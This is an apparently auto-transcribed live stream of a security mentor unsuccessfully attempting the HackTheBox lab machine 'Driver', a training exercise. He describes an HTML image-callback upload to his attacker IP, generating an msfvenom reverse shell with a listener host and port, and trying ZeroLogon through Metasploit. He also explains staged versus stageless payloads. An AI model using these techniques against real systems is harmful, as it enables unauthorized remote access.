10,000 people have solved. Okay, Clay Hacks again, like... don't tell me stuff. Because if I ever try and do that box... this took you a while? Alright, well, I mean, this may... We'll do it until I feel tired. And then we'll see what happens. About... yeah, I mean, this does seem like a custom page because driver updates and contact don't work. So even though it does say that they're manually checking, so what I will do, we're going to create test.html. And we're just going to create, oops. Why am I doing that instead? Okay. Image source equals HTTP 10.10.14.124 exploit. And then what we'll do, sudo tail. Alright. So if we get a hit back on that, it means at least somebody has found it. Somebody's looked at it, I should say, in a browser. Meanwhile, Ferox Buster is just finding variations, so all caps images goes to the same directory, but obviously this images directory we don't have access to. We can't see it. We know it exists because it has a 403 rather than a 404. Okay, something that's not finding anything here, but we are potentially got 1 minute left. Did we get a hit back on anything? No. Testing team will review the uploads manually and initiate the testing. I mean, do we just upload just a regular executable of some kind? HP firmware, or let's just choose one of them. Let's do design jet. Download the zip file. Why won't it download? Copy link. You just get this? Oh my god, why did it not? Oh, it's FTP, that's why. It's not even available. Firmware. Oh my goodness. I mean, I guess we'll just go with this one, that's smaller. .ful. So if I do file on this job language data, original BDL. This isn't even a BDL, so is this like a zip then? Can you like unzip this? How do I do unzip list? Not a zip file. We're either missing something. Someone will run the file manually. So do we just have to give it an exe then? That's my question. So you can just do MSF Venom. -L. What am I even doing? Reverse. I think we can. No, okay. Oh, list payloads. You know, I actually have this in my. There we go. We'll do stageless. Alright, so we want to do L host 10 10 14 124 L port 4444. No idea if this will even work. One more. Oh, I need to do equals. Damn it. Do the newbies understand staged versus stageless? Good question. If you don't, staged means it's usually going to be very small, and this is the first stage. All its job is to connect back to your Metasploit, at which point Metasploit will upload the second stage. And the first stage will then execute the second stage, and it'll become a proper shell. Stageless, however, is basically both stages all in one. So whenever this runs, it will connect back. The advantage of a stageless is that you can catch it with netcat. Whereas with staged, you obviously have to catch it with Metasploit, because Metasploit understands when a staged payload gets caught. But we can usually just do this with netcat. So let's see. I don't even know if this is going to work. Recent. Submit. Well, I guess we just wait. This would be kind of... I mean, it'd be kind of dumb, but it is would be slash quote easy. Because, yeah. If you just have to upload a binary that runs. However, I imagine it maybe every minute, so we have to wait. There's also the possibility it checks to see if this is a whatever the file was. HP printer job language data, but I don't know. What was the RevShell Gen tool? Yeah, so it is actually called RevShell Gen. Where's RevShell Gen? I think it's this one I use. Let me copy it. Yep, absolutely ask questions. That's the whole point of this. I mean, this is just not working. It just feels like a custom one. So, like, I feel like we're supposed to... do something like... The page to the upload gives a good hint. Yeah, I mean, I read that. Our testing team will review the uploads manually. But the thing is, I gave it a .exe, which... I mean, the thing is, if we have to generate one of these firmware files with something malicious in it, I honestly don't know how to do that. And I don't know if Metasploit does, or MSF console. Sorry, Venom. HP firmware. And this just doesn't seem like a box that can be completed in, let's say, an hour. If that's the case, it probably requires me to go off and do a bunch of research. I mean, I imagine it's not just something easy like we're going to be able to do something like this. But we'll try it. Yeah. MFP firmware update center. And this is Lenovo, which is not what we want. So I don't know why I even clicked that. Printer exploit toolkit. Can give you a hint, but actually, so okay, thanks. Yeah, just let me. Well, just saw a. Here's a new tool. Okay. Was port 9100 open? Let's have a look. No. Can you just save it? Thanks, Winston. Thanks for stopping by. Code
Oh
execution.
god, what is this,
firmware.
Tiberius?
Believe me, I have no idea. Well, I think we're on the right track with this. Firmware updates. Here we go. Firmware can be downloaded. Yeah. Okay, so it probably is this RFU that we need. How to test. So this RFU was that what we had here? No. So I need an RFU. Oh god. All right, let's have a look for a note. Yeah, we'll do the design jet again. Oh my god, stop. Submit. Yeah, I'm guessing it's this. Drivers. I'm able to find drivers. Great. Okay. My goodness. Can I just go to... There we go. Drivers. Here we go. I want a printer driver, please. What was it again? Design jet. Try that one. No, my God. Design jet driver HP. Universal print driver. There we go. Try manual. Oh, do I have to? Oh my God. Okay. Ah, crap. Do we have any idea what? Well, it's 64-bit. Can we figure out the version from this? Probably, actually. Oh, hang on. Did I go? What if I can just use one of these UUIDs, maybe? I mean, let's just see. Yeah, I mean, I figured it was ridiculous. I'm just going to assume it's Windows 7. Okay. Close the driver. Basic drivers. That's an exe, don't need that. Crap, come on. These are all exes. Ah, great. Yeah, I mean, I assume I'm gonna try this LaserJet Pro. Oh my God. Multifunction. Oh, I wish it wouldn't forget. Oh God. That's an exe. Somebody wanted a freaking Windows box. They had to choose a. I don't know. Understand how did 11,000 no 10,000 people get this? Unless everybody just cheated at the end. Like, either I'm just missing something super obvious, which I don't think I am. Oh, enum for Linux did work. But obviously nothing happened there. Windows 7 for 0. Man, this is dumb. If it's vulnerable to zero login and it has this stupid firmware update, I'm going to be really annoyed. What was the zero logon thing? Thing is, I don't really do any internal stuff, so. Can I just do zero logon with Metasploit? Like, I honestly don't know how you'd even detect zero logon. I guess we just have to go into Metasploit. This is why I much prefer doing non-Windows. I don't even know if this is going to work. We're just going to try it because somebody said it in chat. Name. Oops. I think it's just driver. Where are we? Enum for Linux, did that say it? No. It could just be driver.hackthebox, I guess. We'll see.
Mr. Streamer!
Set our hosts driver.hackthebox. RPC port. Well, the RPC port was 1.3. I mean, yeah. Yeah, I mean, I don't even really know what would give me a clue that this was zero logon. I don't, I mean, like I said, I don't do internal stuff really, so I don't. I imagine it's not zero logon. And then the thing is, somebody's saying don't get tunnel vision. I don't really know. Like, there's only one thing on this box that is unusual, which is this update center. So I don't understand how I can't get tunnel vision. Like, if this update center isn't the way in, it's really stupid. Would this be an instance where Bert might give us more info? I don't think so, though. Like, all that Burp does when you upload a thing is it says the location, it just redirects this success message. Yeah, I mean, I really don't. I mean, if it's anything like what I've been reading, which is basically, where is it? This stupid firmware update. If it's anything like this, then honestly, I'm not even entirely sure I could do it. Like, I mean, these guys needed Visual Studio 2008 Pro. And this hacking printers wiki looks promising. Where was it? Here. This looks promising, but again, it's. I can't. I need to find this .rfu. Maybe I just Google for it. Exploit. Let's just do this. But this to me sounds like we're tunnel visioning. It doesn't help that none of this FTP server appears to be down. Because did Firefox remove its FTP? Firefox used to be able to connect to FTP. Let's have a look at this crap. Fur malware, I like it. All right. I mean, this doesn't really tell me anything about how this is. Alright, let's try and connect to this FTP server then. Oh, it's just ftp.hp.com. Alright. It's not even available. Yes, yeah, Sample firmware. I just want some. Lotus somewhere, okay. Oh man, this just sucks. We may just, I mean, if this isn't, well, that's a zip, I guess. Screw it, we're gonna download this and see what the hell is going on. Jeez, it's massive though. This is huge. 323 megs. Okay, I mean, can I try and find something a little better? What have we got? Design jet. Alright, thanks, Mythical Moon. Put it in quotes and see what the hell happens. Alright, well this might be good. No, these are FMWs. I don't want FMWs. I want this .rfu. At some point, I've just got to call it because I don't feel like we're getting anywhere. Let's list contents of this. Unzip dash list. Sorry. No, that's a BDL. Well, now I know why there was a folder called driver in HackTheBox, and I don't remember doing this box. Possibly because I got this far and I just don't know. Well, there's a frigging walkthrough for it, but I don't want to do a walkthrough. I feel like this just isn't a good box to do on Side Mentoring Monday, especially if only 2,000 people solved it without a hint. So I think I'm just going to call it. It's getting later than I even planned to be streaming. I'm sorry we didn't get around to doing a Windows box. I don't want people to spoil it for me. Maybe it's something we do, but honestly, if it is anything like doing some firmware hacking, to be honest with you, I don't have any interest in it. It's the same as binary reversing. I have zero interest. It's not cool to me. It's not fun. So, like, I'm fine doing internal things. Like, if we're doing Active Directory stuff, that's okay. I mean, sure, I guess it will save me some time. Yeah, do we just say yes or no? Does it involve modifying firmware and uploading it? No. But then I have no idea what the hell it is then. Because our executable stuff didn't work. So yeah. Oh boy. I'm going to delete that stupidly big file now though. I mean, I clearly missed something really obvious then. But I can't see what I missed. We couldn't find any of these files that we uploaded. The hint was our testing team will review the uploads manually. I uploaded both an HTML file, which should have done a callback via an image. I uploaded a reverse shell executable. Neither of those did anything. So I don't really get what... Select a printer and upload the respective firmware update to our file share. I mean... That doesn't tell me anything either, though. It's being uploaded to a file share. There is no file share available to us. SMB client didn't work. Oh, I killed it. But you can see access denied. So I don't understand where it even wants us to go. I mean, clearly it's going to be uploaded to a file share. Where else would it be uploaded to? I mean, I don't want any more hints, really. It just... Funky Windows thing? But the dumbest thing is, there's nothing... You know, it just has a file name and the binary. It's not like... If it was some kind of SSRF where I had to give it like a file path, we could have at least tried doing something like... where is it? Doing something like this, where, you know, my IP address. But it's not that. I think you have to have seen this type of attack before to know what to do. Yeah, I mean... I can't think of anything.
Thank you for following.
Thanks for following, Ahmed. Yeah, I can't think of anything where you would just have a file and this, which goes to a file share that is just automatically exploitable somehow. Yeah. Oh well. Let's not do that box again. On the screen of my socials. Follow me on Twitter while it still exists. Join the Discord server. You'll get announcements when we go live. Also, subscribe to my YouTube channel, and you're probably watching me on Twitch right now. If you haven't given me a follow, please give me a follow. And thanks, everybody. Sorry that last box was just rubbish. But not the kind of one we want to see on a Cyber Mentoring Monday, unfortunately. But at least the first one was okay. Anyway, I hope everybody has a great rest of the week, and I will see you soon.